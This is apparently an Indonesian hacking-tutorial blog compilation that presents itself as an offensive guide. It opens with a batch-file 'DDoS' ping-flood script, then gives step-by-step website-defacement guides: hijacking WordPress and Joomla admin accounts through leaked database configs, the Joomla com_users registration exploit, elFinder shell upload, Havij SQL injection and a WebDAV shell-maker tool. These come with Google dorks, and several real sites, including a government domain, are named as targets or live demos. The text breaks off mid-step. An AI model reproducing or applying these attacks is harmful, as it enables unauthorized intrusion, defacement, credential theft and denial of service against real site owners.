Cara Membuat Ddos Sendiri Mengunakan Notepad

1.Copy Tulisan Ini
@echo off
mode 67,16
title DDOS Attacking Server
color 0c
cls
echo ==================================
echo =          Hacking Tools         =
echo ==================================
echo.
echo +++++++++++++++++++++++++++++++++++
echo + Name : DDOS Attacking Server    +
echo + Author : XCode-404              +
echo + Visit : www.Xcode-404Uci.blogspot.com  +
echo ++++++++++++++++++++++++++++++++++
echo.
goto Next
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo **********************************
echo *    Masukan IP / Host Target    *
echo **********************************
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0b
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

2.setelah di copy buka Notepad dan Salin Ke Notepad  Dan Simpan Dengan Nama DDOS.bat Dan Ubah Ke all files

Cara Deface Website Mengunakan Config

Selamat malam sobat  :D langsung aja sekarang mau kasih cara deface dengan config :D

Bahan - Bahan :

1. MySQL Interface | Download

2. Web Config

3. Video Tutorial | Download

Disini saya tidak akan membahas bagai mana mencari config dalam web, sobat bisa lihat di artikel Cara Mencari Config Dalam Website :)

Pertama silahkan sobat buka Link yang berisikan config :)

Config CMS Wordpress

Pilih salah satu config database CMS Worpress 

Masukkan Username Dan Passwordnya  ke My SQL Interface Lalu Login  :)

Kemudian Pilih kolom ke 2 lalu klik Tables

Setelah itu pada kolom wp_users  klik Data

Disini kita akan mengubah passwordnya, Klik Edit

Lalu ubah passwordnya dengan password kamu, disini saya mengubah passwordnya "12345" dan di encrypt ke type MD5 menjadi "827ccb0eea8a706c4c34a16891f84e7b" untuk encrypt password disini

Lalu klik Edit Data untuk menyimpan perubahan. dan Silahkan sobat Loggin ke halaman login website :) kalo di CMS wordpress halaman loginnya berada:

http://sitetarget.com/wp-login.php

http://sitetarget.com/path/wp-login.php

Selanjutnya tinggal Tanem Shell di web tersebut, sobat bisa lihat Disini

Config CMS Joomla

Pilih salah satu config CMS Joomla :)

Masukkan Username Dan Passwordnya  ke My SQL Interface Lalu Login  :)

Kemudian Pilih kolom ke 2 lalu klik Tables

Setelah itu pada kolom jos_users  klik Data

Disini kita akan mengubah passwordnya, Klik Edit

Lalu ubah passwordnya dengan password yg sobat inginkan, disini saya mengubah passwordnya "12345" dan di encrypt ke type MD5 menjadi "827ccb0eea8a706c4c34a16891f84e7b" untuk encrypt password disini

Lalu klik Edit Data untuk menyimpan perubahan. dan Silahkan sobat Loggin ke halaman login website :) kalo di CMS Joomla halaman loginnya berada:

http://sitetarget.com/administrator

http://sitetarget.com/path/administrator

Selanjutnya tinggal Tanem Shell di web tersebut, sobat bisa lihat Disini

Selamat Mencoba, :) Semoga Bermanfaat :)

Cara Deface Website Mengunakan Com

Com_User adalah Teknik Exploit Joomla yang paling banyak diminati oleh defacer-defacer yang ada di seluruh indonesia. Com_User / Teknik Exploit joomla ini bisa di gunakan untuk web yang menggunakan joomla versi 1.6/ 1.7.3/ 2.5.

Bahan-Bahan
1. Exploit Joomla (download disini)

Langkah-Langkah
1. Cari web target di google dengan google dork ini.

Baca Juga: Google Dork Com_User

intext:Veuillez utiliser un identifiant et un mot de passe valides pour accéder à l'administration. site:it
(atau)
intitle:joomla! intext:joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com
(atau)
intext:Введите существующие логин и пароль доступа к Панели управления. site:ru

Penjelasan:
*site: boleh diganti dengan com/ ca/ it/ za/ id/ ru dll (terserah anda)

intitle berarti, kata yang terkandung dalam judul sebuah Web.
intext berarti, kata yang terkandung didalam web tersebut.
site berarti, domain yang digunakan oleh web tersebut. ca=Canada ru=Russia dan sebagainya.

*Google Dork kembangin sendiri agar mendapat hasil yang lebih maksimal.

2. Open link in new tab, semua web yang muncul di hasil pencarian google. karena tidak semua web bisa.
3. Cari web yang vuln.

Gambar diatas merupakan site Vuln.

Gambar diatas merupakan site "Joomla yang samar-samar".

Note: "Perbedaan Site Vuln dengan yang lainnya, terlihat pada bagian bawah atau footer Admnistration Login pada web Joomlanya."

*Web yang saya namakan "samar-samar" itu bukan berarti sitenya tidak tidak bisa di deface/ tidak vuln, hanyasaja web yang seperti itu peluangnya dapat di defacenya  hanya 5% dari keseluruhan web joomla seperti gambar diatas. Tapi jika anda telah lama mendeface web dengan cara ini, anda akan mengetahui ciri-ciri Web Joomla yang bisa di deface tanpa harus melihat halaman administratornya.

*Pastikan Web yang anda ingin deface adalah web yang vuln. karena web yang vuln 60% nya bisa di deface.

4. Setelah menemukan site yang vuln. masukkan exploit berikut di belakang sitenya

index.php?option=com_users&view=registration

*misal, web yang akan saya deface adalah http://www.ssjuvestabia.it. maka, saya harus menambahkan exploit di belakang alamat web tersebut menjadi http://www.ssjuvestabia.it/index.php?option=com_users&view=registration

5. setelah sudah mengikuti langkah diatas, anda akan masuk ke tempat registrasi.

6 Setelah masuk ke tempat registrasi seperti gambar diatas. maka langkah selanjutnya adalah menekan tombol ctrl+u / klik kanan -> Lihat sumber laman dan akan muncul tampilan seperti gambar di bawah.

7. Cari kode hidden (dengan ctrl+f )dan cari kode seperti gambar di bawah ini. 

8. Copy code yang di beri kotak merah tersebut ke Exploit Joomla yang telah kamu download tadi.

9. Buka Exploit Joomla yang telah kamu download tadi dengan Notepad. Lalu kamu paste kode yang telah kamu copy tersebut dikotak merah kedua (yang di paling bawah). Dan masukkan alamat web yang telah di exploit tersebut contoh: http://www.ssjuvestabia.it/index.php?option=com_users&view=registration ke kotak merah pertama yang terdapat di tempat paling atas.

*Jangan lupa ganti alamat email dan username nya (terserah kamu )

*Password dibiarkan berbeda

10. Save file tersebut.

11. Lalu buka Exploit Joomla tersebut dengan web browser (google chrome/mozilla firefox )

12. Setelah di buka, maka akan muncul tampilan seperti gambar di bawah ini.

13. Setelah di buka dengan web browser dan muncul tampilan seperti gambar berikut. Lalu langkah selanjutnya adalah klik tombol Register yang terdapat di bagian bawah.

14. Lalu akan ada tulisan password yang anda masukkan tidak sama. (kalau di bahasa indonesia kan)

15. Ganti password tersebut (terserah anda) dan klik register kembali.

16. Setelah sukses, buka alamat link aktivasi yang terdapat di email anda.

*Jika alamat link aktivasi tidak masuk ke INBOX sebuah web, coba lah lihat di halaman SPAM. Dan jika tidak masuk kedua-duanya, cobalah reload/refresh email anda.

17. Setelah di klik link aktivasi pada email, maka anda telah menyelesaikan registrasi. dan anda bisa login kedalam halaman administrator. (tambahkan kode /administrator di belakang alamat web tersebut)

*misal alamat web nya adalah http://www.ssjuvestabia.it/ maka anda harus menambahkan /administrator di belakang web nya. seperti http://www.ssjuvestabia.it/administrator/

18. Setelah itu anda masukkan username dan password, lalu login.

19. Taraaaa, sekarang anda sudah masuk kedalam halaman adminnya dan tinggal di tebas indexnya.

Cara tebas Index di web Joomla

Cara memasang shell di web Joomla

*Ada 4 kemungkinan GAGAL untuk web yang menggunakan CMS Joomla:

1. Web telah menghapus laman Registration Form.

2. Alamat Activation Link tidak masuk kedalam email.
3. User sudah diaktifkan tetapi kita tidak bisa masuk kedalam administrator panel tersebut.

4. Template tidak bisa di di ubah.

Paling sering GAGAL pada nomor 2

Cara Deface Webite Mengunakan elFinder

Assalamualaikum Wr.wb , Bertemu bersama saya lagi ya, hehehe kembali bersama artikel exploit saya, ya saya sih cuma iseng aja untuk mengisi waktu luang, berhubung sudah lama gak posting? Nih nikmatin yang terbaru dari saya hahaha :D

DORK: inurl:/elfinder/ intitle:index of (kembangin lagi)
POC: http://localhost/Patch/elfinder/elfinder.php.html or elfinder.php
PREVIEW: Klik dua kali file yang kita upload

Nih preview gambar elFinder nya:

Buat kalian yang mau mempelajarinya? Saya kasih live demo nya deh biar makin paham hehehe.
Nih dia life demonya:
http://www.avalon.ua/mcstudio/admin_stuff/js/elfinder/elfinder.php
Hasilnya :
http://www.avalon.ua/upload/usr/Asoy.txt
Ok, materi yang saya kasih gak pernah susah, saya kasih selalu yang mudah agar mudah dipahami.
Sekian dulu ya, Wassalamualaikum Wr.wb - See more at: http://predator-technology.blogspot.com/2013/06/elfinder-shell-upload-vulnerability.html#sthash.9a6lSco4.dpuf

Cara Deface Website Dengan Menggunakan Havij 1.15

Cara Deface Website Dengan Menggunakan Tools Havij 1.15
Download Tools :


Havij Version 1.15 Free | 2.75 MB
Password : Installation Setup

Download Tools Havijnya dari Mediafire
Lalu Extract Filenya
Kemudian Double Klik Icon Havijnya
Selesai.
1). Kalo Tools Havijnya sudah terinstal, buka tools tersebut dengan cara double click.

2). Nah, sekarang kita cari targetnya. Karena saya belum sempat share Dorknya, Jadi sobat bisa cari Dorknya di Google, Banyak kok :D


3). Jika target sudah dapat, saya ambil contoh http://www.dephut.go.id/index.php?q=hotspot&hid=2054


4). Kita masukkan target tersebut kedalam kolom target No 1, terus liat dilangkah No 2, terlihatkan nama databasenya, kemudian kalo udah berhasil klik table yang sudah saya tandai dengan nomer No 3.

5). Kalo sudah sobat klik, maka tampilannya akan seperti dibawah ini. Lalu kalo sudah, sobat klik lagi Get Tables, liat nih gambar dibawah.

6). Akan ada banyak sekali table-table yang terbuka. Terus ayo kita tebak dimana letak admin & passwordnya berada. Saya menebak kalo user dan passwordnya ada ditable web_users. Okelah, kita coba table tersebut, kita liat isinya dengan hanya mengklik GetColoums yang terletak disebelah Get Tables yang saya tandai degan No 2.

7). Selanjutnya tinggal sobat centang data yang ingin sobat ambil. Saya tandai dengan No 1, lalu klik Get Data, Kemudian kita lihat apa yang terjadi.

8). Ayeee, keliatankan user sama passwordnya, tapi masih terenkripsi dengan MD5. Cara mengenkripsinya mudah kok, karena tools ini juga menyediakan enkripsi untuk MD5.

9). Yang paling penting sobat tinggal mencari halaman login adminnya, Sobat hanya perlu mengklik Icon yang berjudul Find Admin, kemudian tunggu hingga muncul tulisan I'm IDLE.


Nah bagaimana sob? lebih mudah atau lebih sulit dengan cara yang pernah saya post sebelumnya, kalo menurut saya cara ini adalah cara terpraktis, termurah dan paling gampang kalo kita mau meretas sebuah website.

Pro Facebook Hack V 1.5 Premium 2013 and Password

Hi sobat Ehacker
sekarang gua mau share tentang Pro Facebook Hack V 1.5 Premium 2013

cekidot ga banyak cocod okay

Download Pro Facebook Hack v 1.5 Premium 2013
4shared : "Click Here"

Password : 8498646548054694

Cara Deface Mengunakan Hmei7

Ok deh langsung saja ke inti postingan kali ini, o'ya! disini saya hanya memberikan tutorial untuk pembelajaran. Bukan sok2'an jadi hacker ,cracker, ceker atau apalah, saya hanya ingin berbagi karena Berbagi Itu Indah

Dengan menggunakan sebuah tools hacking buatan Hmei7 kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut.

Sebelumnya soba harus mendowload tools Webdav Shell Maker'nya. Dibawah sudah saya siapkan link downloadnya.

Download Link :
Hmei7 Webdav Shell Maker : disini
Sheelnya : disini dan disini
web yang vuln : disini

Tutorial Deface Web dengan Webdav Shell Maker :
1). Download kemudian extract file ls-rootkit.Rar
2). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'.

3). Buka menu Setting, pada menu setting Name of your shell bisa diubah dengan nama kamu, kemudian Load Shell from file, pilih my deface.html

dan akan berisi seperti ini